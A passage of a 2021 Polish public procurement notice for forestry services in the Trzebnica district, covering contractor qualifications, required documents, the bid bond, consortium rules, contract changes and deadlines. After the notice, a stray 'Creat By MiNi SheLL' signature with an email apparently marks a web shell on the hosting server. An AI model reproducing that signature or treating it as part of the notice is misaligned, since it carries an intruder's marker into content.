minimum 3,9 m do<br/>podkrzesywania drzew,<br/>4.Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia,<br/>zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponować: -<br/>co najmniej 2 osobami, które ukończyły z wynikiem pozytywnym szkolenie dopuszczające do<br/>pracy z pilarką zgodnie z § 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w<br/>sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki<br/>leśnej (Dz. U. Nr 161, poz. 1141) lub posiadające odpowiadające im uprawnienia wydane na<br/>podstawie poprzednio obowiązujących przepisów albo odpowiadające im uprawnienia wydane w<br/>innych Państwach Członkowskich Unii Europejskiej;<br/>- co najmniej 1 osobą nadzoru z wykształceniem leśnym wyższym, leśnym średnim lub<br/>posiadającymi dyplom ukończenia studium zawodowego świadczenia usług na rzecz leśnictwa.<br/>- co najmniej 1 osobą, która ukończyła szkolenie w zakresie pracy ze środkami chemicznymi<br/>zgodnie z rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 8 maja 2013 roku w<br/>sprawie szkoleń w zakresie środków ochrony roślin (Dz. U. z 2013 r. poz. 554) lub posiadające<br/>odpowiadające im uprawnienia wydane na podstawie poprzednio obowiązujących przepisów<br/>które uprawniają do pracy w kontakcie ze środkami ochrony roślin. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis lub informacja Krajowego Rejestru Karnego w zakresie:(a) art. 108<br/>ust. 1 pkt 1 i 2 PZP,(b) art.<br/>108 ust. 1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem<br/>środka karnego, (c) art. 109 ust. 1 pkt 2 lit a) PZP, (d) art. 109 ust. 1 pkt 2 lit b) PZP, dotyczącej<br/>ukarania za wykroczenie, za które wymierzono karę aresztu, (e) art. 109 ust. 1 pkt 3 PZP, dotyczącej<br/>skazania za przestępstwo lub ukarania za wykroczenie, za które wymierzona karę aresztu -<br/>sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem,<br/>b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej<br/>grupy kapitałowej,- (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 7 do<br/>SWZ),<br/>c) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub<br/>opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności,<br/>e) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>f) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 PZP (oświadczenie o braku podstaw do wykluczenia, sporządzone wg załącznika nr 5B do<br/>SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których<br/>mowa w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu<br/>ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP,<br/>dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 PZP, e) art. 109 ust. 1 pkt 1 PZP, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r.<br/>o podatkach i opłatach lokalnych (tekst jedn. Dz. U. z 2019 r., poz. 1170 z późn. zm.), f) art. 109 ust. 1<br/>pkt 2 lit b) PZP, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia<br/>wolności lub karę grzywny, g) art. 109 ust. 1 pkt 2 lit c) PZP, h) art. 109 ust. 1 pkt 3) PZP, dotyczących ukarania za wykroczenie, za które wymierzono karę ograniczenia wolności lub karę grzywny, i) art. 109<br/>ust. 5 i 7-10 PZP - (wzór oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania stanowi<br/>załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>Wykonawca złoży w terminie 5 dni od dnia wezwania dokumenty wskazane w rozdziale IX SWZ:<br/>a) wykaz usług o którym mowa w rozdziale IX SWZ (wzór wykazu wykonanych usług stanowi załącznik<br/>nr 9 do SWZ),wraz z dowodami, że wskazane przez Wykonawcę usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego usługi były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w terminie ostatnich 3 miesięcy od dnia w którym<br/>termin składnia ofert.<br/>b) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem,<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego (wzór wykazu<br/>osób skierowanych przez wykonawcę do realizacji zamówienia stanowi załącznik nr 10 do SWZ),<br/>d) wykaz urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego<br/>(wzór wykazu urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia stanowi<br/>załącznik nr 11 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ wykonawca zobowiązany jest złożyć<br/>Zamawiającemu Ofertę zawierającą:<br/>a) formularz Oferty (wg wzoru stanowiącego załącznik nr 1 do SWZ) sporządzony pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym,<br/>b) kosztorys ofertowy (wg wzoru stanowiącego załącznik nr 2 do SWZ) sporządzony pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym,<br/>c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 5A i<br/>załącznik nr 5B do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób<br/>upoważnionych do reprezentacji podmiotu składającego oświadczenie, złożone przez: -<br/>Wykonawcę, - Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile<br/>wykonawcy wspólnie ubiegają się o udzielenie zamówienia);d) oświadczenia, sporządzone<br/>zgodnie ze wzorami stanowiącymi odpowiednio załącznik nr 5C i załącznik nr 5D do SWZ, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu<br/>udostępniającego Wykonawcy zasoby na zasadzie<br/>określonej w art. 118 PZP, o ile dotyczy, e) zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania Wykonawcy do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów zgodnie z pkt 9.4. SWZ, jeżeli Wykonawca wykazując spełnienie<br/>warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>(Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi załącznik nr 6 do SWZ), f) odpis lub informacja z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>lub innego właściwego rejestru w celu potwierdzenia, że osoba<br/>działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby na zasadach<br/>określonych w art. 118 PZP, jest umocowana do jego reprezentowania. Wykonawca nie jest<br/>zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca dostarczy dane umożliwiające dostęp do tych dokumentów, g) pełnomocnictwo lub<br/>inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, osoby działającej<br/>w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia lub osoby<br/>działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118<br/>PZP, jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP -<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których<br/>mowa w pkt 13.4. lit f) SWZ, sporządzone w sposób określony w pkt 9.13.-9.22 SWZ,h)<br/>oświadczenie, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Zamawiający zaleca złożenie tego oświadczenia w treści formularza Oferty<br/>stanowiącego załącznik nr 1 do SWZ).i) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem<br/>elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium<br/>w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający wymaga wniesienia wadium w wysokości - 6 400,00 zł<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do<br/>dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1<br/>pkt 2 i 3 oraz ust. 2 PZP<br/>2.Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następującychformach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.:<br/>Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku PKO BP S.A. nr rachunku: 51 1020 5226 0000 6602 0343 3539 z<br/>dopiskiem: wadium na zabezpieczenie oferty w postępowaniu na „Wykonywanie usług z zakresu<br/>gospodarki leśnej na terenie Nadleśnictwa Oborniki Śląskie w roku 2021 w leśnictwie Trzebnica”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone<br/>na rachunku bankowym Zamawiającego. Wadium wniesione w pieniądzu Zamawiający<br/>przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub<br/>poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinno wynikać<br/>bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie<br/>związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt 2)-4)<br/>należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj.<br/>opatrzonej kwalifikowanym podpisem elektronicznymi osób upoważnionych do jego<br/>wystawienia. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta<br/>Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie<br/>będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek<br/>o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z<br/>postępowania na podstawie art. 226 ust. 1 pkt 14 PZP w zw. z art. 266 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego),gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz<br/>wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie<br/>przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum):<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać<br/>umocowanie prawne do reprezentacji. Umocowanie musi wynikać z treści pełnomocnictwa<br/>załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3) Oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj. oświadczenie o spełnieniu warunków<br/>udziału w postępowaniu (wg wzoru stanowiącego załącznik nr 5A do SWZ) oraz oświadczenie o<br/>braku podstaw do wykluczenia (wg wzoru stanowiącego załącznik nr 5B do SWZ) składa każdy<br/>z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, o których mowa wyżej powinny zostać złożone wraz z<br/>ofertą pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 3. obowiązany będzie złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić<br/>odpowiedzialność solidarną za wykonanie umowy i wniesienie zabezpieczenia należytego<br/>wykonania umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie<br/>Wykonawcę kierującego (lidera), upoważnionego do zaciągania zobowiązań, otrzymywania<br/>poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w<br/>całości przez lidera lub od wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia łącznie lub każdego z osobna.<br/>8) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu<br/>do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym zgodnie z art. 117 ust. 4 PZP Wykonawca jest zobowiązany załączyć<br/>do oferty podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy. Wzór stosownego oświadczenia został zawarty w<br/>formularzu Oferty stanowiącym załącznik nr 1 SWZ i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został zawarty we wzorze umowy stanowiący załącznik nr 12 do SWZ:<br/>Zamawiający przewiduje możliwość zmian postanowień Umowy w stosunku do treści Oferty, na<br/>podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z<br/>okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich<br/>wprowadzenia:<br/>1) Zamawiający dopuszcza możliwość przedłużenia okresu realizacji Przedmiotu Umowy o<br/>okres odpowiadający okresowi trwania przeszkody uniemożliwiającej realizację Przedmiotu<br/>Umowy lub o okres niezbędny do wykonania Przedmiotu Umowy w minimalnym zakresie<br/>deklarowanym przez Zamawiającego w § 1 ust. 4 Umowy, jeżeli w trakcie realizacji Umowy<br/>wystąpią okoliczności uniemożliwiające realizację jej przedmiotu zgodnie z warunkami opisanymi<br/>w Umowie, za które odpowiedzialności nie ponosi Wykonawca, ani Zamawiający.<br/>2) Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania (technologii)<br/>Przedmiotu Umowy, w przypadku, gdy wystąpi co najmniej jedna z poniższych sytuacji:<br/>a) konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań niż<br/>wskazane w Opisie Przedmiotu Zamówienia w sytuacji, gdyby zastosowanie przewidzianych<br/>rozwiązań groziło niewykonaniem lub wadliwym wykonaniem Przedmiotu Umowy albo naruszało<br/>obowiązujące przepisy prawa;<br/>b) konieczność zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań albo<br/>innymi środkami ze względu na zmiany obowiązującego prawa lub regulacji obowiązujących w<br/>Państwowym Gospodarstwie Leśnym Lasy Państwowe;<br/>c) pojawienie się nowszych technologii wykonania prac gwarantujących co najmniej ten sam<br/>standard wykonania Przedmiotu Umowy oraz nie powodujących większych strat i<br/>zanieczyszczeń w środowisku naturalnym niż te, które mogą powstać przy wykonywaniu<br/>Przedmiotu Umowy w sposób pierwotnie nią opisany.<br/>Żadna ze zmian wskazanych w lit. a) – c) nie może pociągnąć za sobą zwiększenia<br/>wynagrodzenia należnego Wykonawcy.<br/>3) Zamawiający dopuszcza wprowadzenie zmian w zakresie sposobu organizacji spełnienia<br/>świadczenia, w tym przeprowadzania odbiorów, jeśli nie zmniejszy to standardu świadczenia<br/>usług i nie spowoduje zwiększenia kosztów dokonywania odbiorów, które obciążałyby<br/>Zamawiającego.<br/>4) Zamawiający dopuszcza wprowadzenie zmian w technologii pozyskania drewna w<br/>sytuacjach, gdy zmiana technologii umożliwiłaby Wykonawcy terminową lub należytą realizację<br/>zobowiązań wynikających z Umowy, z zastrzeżeniem, że zmiana technologii nie będzie<br/>powodować wzrostu kosztów ponoszonych na realizację Przedmiotu Umowy i będzie<br/>uzasadniona w świetle zasad prawidłowej gospodarki leśnej.<br/>5) W przypadku zawarcia Umowy z wykonawcami wspólnie ubiegającymi się o udzielenie<br/>zamówienia Zamawiający dopuszcza się wskazanie członka lub członków konsorcjum<br/>upoważnionych do wystawiania faktur i do odbioru wynagrodzenia.<br/>6) Zamawiający dopuszcza zmianę w zakresie treści dokumentów przedstawianych wzajemnie<br/>przez Strony w trakcie realizacji Umowy lub sposobu informowania o realizacji Umowy. Zmiana<br/>ta nie może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej<br/>realizacji Umowy.<br/>7) Ponadto Zamawiający dopuszcza wprowadzenie zmian w przypadku:<br/>a) wystąpienia siły wyższej, co uniemożliwia wykonanie co najmniej części Przedmiotu Umowy ;<br/>b) rezygnacji przez Zamawiającego z realizacji części Przedmiotu Umowy ponad zakres<br/>wskazany § 1 ust. 4.<br/>W takim przypadku może zostać zmniejszony zakres Przedmiotu Umowy, a wynagrodzenie<br/>przysługujące Wykonawcy zostanie pomniejszone w oparciu ceny jednostkowe wskazane w<br/>kosztorysie przy czym Zamawiający zapłaci wynagrodzenie za wszystkie odebrane świadczenia.<br/>2. Wystąpienie którejkolwiek z okoliczności wskazanych w ust. 1 nie stanowi zobowiązania Stron<br/>do wprowadzenia zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Platformy wroclaw-lasy.logintrade.net.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-02 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-31</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com